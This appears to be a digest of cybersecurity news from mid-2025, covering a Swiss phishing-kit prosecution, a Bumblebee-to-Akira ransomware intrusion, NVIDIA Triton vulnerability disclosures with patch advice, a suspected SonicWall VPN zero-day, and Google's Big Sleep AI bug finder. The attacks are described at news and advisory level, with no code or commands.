Bern, 29.07.2025 — The Office of the Attorney General of Switzerland (OAG) has been conducting criminal proceedings since 2022 in the matter of a large-scale phishing series. Fake e-banking login pages had been used to defraud numerous Swiss bank customers, resulting in losses of around CHF 2.4 million. In this context, the OAG took over about thirty cases from the cantons. The investigations conducted by the OAG and fedpol led to the identification and location of the developer and distributor of phishing kit in the UK. The case was taken over by the British authorities, who were already conducting similar proceedings against the individual involved. He was sentenced by a court in the UK on 23 July 2025 to seven years imprisonment. This success demonstrates the importance of international cooperation in the fight against cybercrime.

In July 2022, the Office of the Attorney General of Switzerland (OAG) initiated criminal proceedings against persons unknown on suspicion of computer fraud (Art. 147 para. 1 in conjunction with para. 2 Swiss Criminal Code (SCC)) in connection with an extensive phishing series. Prior to this, several cantonal public prosecutor's offices had already initiated proceedings in around 30 cases in connection with the same matter, which the OAG subsequently took over and joined in its proceedings. In August 2023, following the identification of the developer and distributor of the phishing kit, criminal proceedings were extended to this person.

Real-time phishing on a grand scale

Between May 2022 and September 2022, unknown perpetrators created and used several fake login websites (phishing pages) for various Swiss banks, using what is known as a phishing kit. Bank customers who used Google Search to access their account ended up on the phishing pages posted as adverts and fell victim to the scam when they attempted to log into their supposed e-banking accounts. As a result, their e-banking access data were intercepted unbeknown to them, enabling the perpetrators to use the stolen access data to log into the victim's e-banking accounts and enable the two-factor authentication. The victims still believed that they were on the bank's real website and authenticated the login by entering the authentication code they received by text message on the phishing page. As a result, the perpetrators gained access to their authentication codes. This enabled them to successfully log into the victims' e-banking accounts and register an additional device with the bank to confirm two-factor authentication. The perpetrators were then able to log into the victims’ e-banking accounts without any further action by the victims and initiate payments without their knowledge or consent. The damage caused to the injured parties in the Swiss criminal proceedings amounts to CHF 2.4 million.

Successful cooperation with the UK, Europol and Eurojust

The intensive investigations conducted by the OAG and fedpol resulted in the identification and localisation of a British national who had developed and distributed the phishing kit. The OAG and fedpol's subsequent close cooperation with Europol, Eurojust and UK law enforcement authorities led to the arrest and prosecution in the UK of the developer and seller of the phishing kit. As the UK authorities were already conducting similar proceedings against this person, they took over the Swiss proceedings at the OAG’s request, continuing them in the UK. The OAG subsequently discontinued its criminal proceedings. On 23 July 2025, the perpetrator was sentenced in the UK to seven years imprisonment for his offences (press release from the Crown Prosecution Service). This success demonstrates the importance and effectiveness of international cooperation in tackling the fight against the ever-increasing cybercrime.

thedfirreport.com - Bumblebee malware has been an initial access tool used by threat actors since late 2021. In 2023 the malware was first reported as using SEO poisoning as a delivery mechanism. Recently in May of 2025 Cyjax reported on a campaign using this method again, impersonating various IT tools. We observed a similar campaign in July in which a download of an IT management tool ended with Akira ransomware.

In July 2025, we observed a threat actor compromise an organization through this SEO poisoning campaign. A user searching for “ManageEngine OpManager” was directed to a malicious website, which delivered a trojanized software installer. This action led to the deployment of the Bumblebee malware, granting the threat actor initial access to the environment. The intrusion quickly escalated from a single infected host to a full-scale network compromise.

Following initial access, the threat actor moved laterally to a domain controller, dumped credentials, installed persistent remote access tools, and exfiltrated data using an SFTP client. The intrusion culminated in the deployment of Akira ransomware across the root domain. The threat actor returned two days later to repeat the process, encrypting systems within a child domain and causing significant operational disruption across the enterprise.

This campaign affected multiple organizations during July as we received confirmation of a similar intrusion responded to by the Swisscom B2B CSIRT in which a malicious IT tool dropped Bumblebee and also ended with Akira ransomware deployment.

The Wiz Research team has discovered a chain of critical vulnerabilities in NVIDIA's Triton Inference Server, a popular open-source platform for running AI models at scale. When chained together, these flaws can potentially allow a remote, unauthenticated attacker to gain complete control of the server, achieving remote code execution (RCE).

This attack path originates in the server's Python backend and starts with a minor information leak that cleverly escalates into a full system compromise. This poses a critical risk to organizations using Triton for AI/ML, as a successful attack could lead to the theft of valuable AI models, exposure of sensitive data, manipulating the AI model's responses and a foothold for attackers to move deeper into a network.

Wiz Research responsibly disclosed these findings to NVIDIA, and a patch has been released. We would like to thank the NVIDIA security team for their excellent collaboration and swift response. NVIDIA has assigned the following identifiers to this vulnerability chain: CVE-2025-23319, CVE-2025-23320, and CVE-2025-23334. We strongly recommend all Triton Inference Server users update to the latest version. This post provides a high-level overview of these new vulnerabilities and their potential impact.

The enclosed work is the latest in a series of NVIDIA vulnerabilities we’ve disclosed, including two container escapes: CVE-2025-23266 and CVE 2024-0132.

Mitigations
Update Immediately: The primary mitigation is to upgrade both the NVIDIA Triton Inference Server and the Python backend to version 25.07 as advised in the NVIDIA security bulletin.

Wiz customers can use the following to detect vulnerable instances in their cloud environment:

Wiz customers can use the Vulnerability Findings page to find all instances of these vulnerabilities in their environment, or filter results to instances related to critical issues. Alternatively, you can use the Security Graph to identify publicly exposed vulnerable VMs/serverless or containers.

Wiz Advanced customers can filter on findings identified or validated by the Dynamic Scanner, and Wiz Sensor customers can filter on runtime validated findings.

Wiz Code customers can filter on findings with one-click remediation to generate a pull request with fixes for vulnerable instances detected in code repositories.

therecord.media - Multiple cybersecurity incident response firms are warning about the possibility that a zero-day vulnerability in some SonicWall devices is allowing ransomware attacks.
Ransomware gangs may be exploiting an unknown vulnerability in SonicWall devices to launch attacks on dozens of organizations.

Multiple incident response companies released warnings over the weekend about threat actors using the Akira ransomware to target SonicWall firewall devices for initial access. Experts at Arctic Wolf first revealed the incidents on Friday.

SonicWall has not responded to repeated requests for comment about the breaches but published a blog post on Monday afternoon confirming that it is aware of the campaign.

The company said Arctic Wolf, Google and Huntress have warned over the last 72 hours that there has been an increase in cyber incidents involving Gen 7 SonicWall firewalls that use the secure sockets layer (SSL) protocol.

“We are actively investigating these incidents to determine whether they are connected to a previously disclosed vulnerability or if a new vulnerability may be responsible,” the company said.

SonicWall said it is working with researchers, updating customers and will release updated firmware if a new vulnerability is found.

The company echoed the advice of several security firms, telling customers to disable SonicWall VPN services that use the SSL protocol.

At least 20 incidents
Arctic Wolf said on Friday that it has seen multiple intrusions within a short period of time and all of them involved access through SonicWall SSL VPNs.

“While credential access through brute force, dictionary attacks, and credential stuffing have not yet been definitively ruled out in all cases, available evidence points to the existence of a zero-day vulnerability,” the company said. None of the incident response companies have specified what that bug might be.

“In some instances, fully patched SonicWall devices were affected following credential rotation,” Arctic Wolf said, referring to the process of regularly resetting logins or other access.

The researchers added that the ransomware activity involving SonicWall VPNs began around July 15.

When pressed on whether any recent known SonicWall vulnerabilities are to blame for the attacks, an Arctic Wolf spokesperson said the researchers have “seen fully patched devices affected in this campaign, leading us to believe that this is tied to a net new zero day vulnerability.”

Arctic Wolf said in its advisory that given the high likelihood of such a bug, organizations “should consider disabling the SonicWall SSL VPN service until a patch is made available and deployed.”

Over the weekend, Arctic Wolf’s assessment was backed up by incident responders at Huntress, who confirmed several incidents involving the SonicWall SSL VPN.

A Huntress official said they have seen around 20 attacks since July 25 and many of the incidents include the abuse of privileged accounts, lateral movement, credential theft and ransomware deployment.

“This is happening at a pace that suggests exploitation, possibly a zero day exploit in Sonicwall. Threat actors have gained control of accounts that even have MFA deployed,” the official said.

He confirmed that the incidents Huntress examined also involved Akira ransomware.

'This isn't isolated'
Huntress released a lengthy threat advisory on Monday warning of a “likely zero-day vulnerability in SonicWall VPNs” that was being used to facilitate ransomware attacks. Like Arctic Wolf, they urged customers to disable the VPN service immediately.

“Over the last few days, the Huntress Security Operations Center (SOC) has been responding to a wave of high-severity incidents originating from SonicWall Secure Mobile Access (SMA) and firewall appliances,” Huntress explained.

“This isn't isolated; we're seeing this alongside our peers at Arctic Wolf, Sophos, and other security firms. The speed and success of these attacks, even against environments with MFA enabled, strongly suggest a zero-day vulnerability is being exploited in the wild.”

SonicWall devices are frequent targets for hackers because the types of appliances the company produces serve as gateways for secure remote access.

Just two weeks ago, Google warned of a campaign targeting end-of-life SonicWall SMA 100 series appliances through a bug tracked as CVE-2024-38475.

techcrunch.com - Google’s AI-powered bug hunter has just reported its first batch of security vulnerabilities.

Heather Adkins, Google’s vice president of security, announced Monday that its LLM-based vulnerability researcher Big Sleep found and reported 20 flaws in various popular open source software.

Adkins said that Big Sleep, which is developed by the company’s AI department DeepMind as well as its elite team of hackers Project Zero, reported its first-ever vulnerabilities, mostly in open source software such as audio and video library FFmpeg and image-editing suite ImageMagick.

Given that the vulnerabilities are not fixed yet, we don’t have details of their impact or severity, as Google does not yet want to provide details, which is a standard policy when waiting for bugs to be fixed. But the simple fact that Big Sleep found these vulnerabilities is significant, as it shows these tools are starting to get real results, even if there was a human involved in this case.

“To ensure high quality and actionable reports, we have a human expert in the loop before reporting, but each vulnerability was found and reproduced by the AI agent without human intervention,” Google’s spokesperson Kimberly Samra told TechCrunch.

Royal Hansen, Google’s vice president of engineering, wrote on X that the findings demonstrate “a new frontier in automated vulnerability discovery.”

LLM-powered tools that can look for and find vulnerabilities are already a reality. Other than Big Sleep, there’s RunSybil and XBOW, among others.